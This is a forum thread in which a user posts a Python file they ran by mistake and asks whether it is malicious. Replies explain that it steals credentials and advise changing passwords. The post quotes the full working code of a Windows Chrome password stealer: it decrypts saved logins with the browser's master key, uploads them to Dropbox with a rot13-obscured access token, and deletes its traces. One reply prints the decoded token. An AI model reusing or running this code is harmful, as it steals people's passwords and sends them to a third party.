Help! I accidentally ran a file without checking the code

Help! I accidentally ran a file without checking the code - Printable Version

+- Python Forum (https://python-forum.io)
+-- Forum: Python Coding (https://python-forum.io/forum-7.html)
+--- Forum: General Coding Help (https://python-forum.io/forum-8.html)
+--- Thread: Help! I accidentally ran a file without checking the code (/thread-30988.html)

Help! I accidentally ran a file without checking the code - scaryzane - Nov-16-2020

So I accidentally ran this file today, and didnt check the python code. Can anybody tell me if this code is malicious?

import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import dropbox
from codecs import encode
import getpass


def upload_passfile():
    access_token = encode("pYTjP6sifCxNNNNNNNNNNDIRXrA2kfdgl93KiKK1ddIgXDbvfwWFMmDlTyB1EP0i", 'rot13')
    file_from = "rc.txt"
    file_to = "/passwords/" + str(getpass.getuser()) + "'s_passwords.txt"
    client = dropbox.Dropbox(access_token)
    client.files_upload(open(file_from, "rb").read(), file_to, dropbox.files.WriteMode.overwrite, mute=True)


def get_master_key():
    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]  # removing DPAPI
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
        return decrypted_pass

    except Exception as e:
        decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
        return str(decrypted_pass[1])


if __name__ == '__main__':

    master_key = get_master_key()
    login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
    shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        passfile = open("rc.txt", "w")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
        passfile.close()
        conn.close()

    except Exception as e:
        print(e)

    upload_passfile()
    os.remove("rc.txt")
    os.remove("Loginvault.db")

RE: Help! I accidentally ran a file without checking the code - jefsummers - Nov-16-2020

Without deep analysis, this looks like it is trying to obtain your passwords. I would worry, and change all my critical passwords NOW.

RE: Help! I accidentally ran a file without checking the code - iiAsez - Dec-25-2020

I had this issue too but after some code analyses I found out that it only retrieves some of your passwords, so I suggest that you change your most important ones, or all of them (recommended).

RE: Help! I accidentally ran a file without checking the code - DeaD_EyE - Dec-25-2020

Hm, the hacker should have used Pathlib and his hack works only on Windows.

Getting master key from Chrome
Copy Login Data to another place (Chrome locks the database)
Iterating over the SQL SELECT of logins and password, saving line by line in a text file rc.txt. Using the masterkey to decrpyt.
Sending the rc.txt to a Dropbox account
deleting the rc.txt and the copy of the login database.

One thing is strange. From where comes the module Dropbox?
This hack can only work, if the dropbox dependency is installed in your current Python Interpreter.

PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v

RE: Help! I accidentally ran a file without checking the code - buran - Dec-25-2020

(Dec-25-2020, 02:10 PM)DeaD_EyE Wrote: PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v

Probably you can report them. It most likely violates Dropbox ToS.

RE: Help! I accidentally ran a file without checking the code - DeaD_EyE - Dec-30-2020

They are investigating now but the team is not allowed to visit external urls.
So, I provided them also with source code today.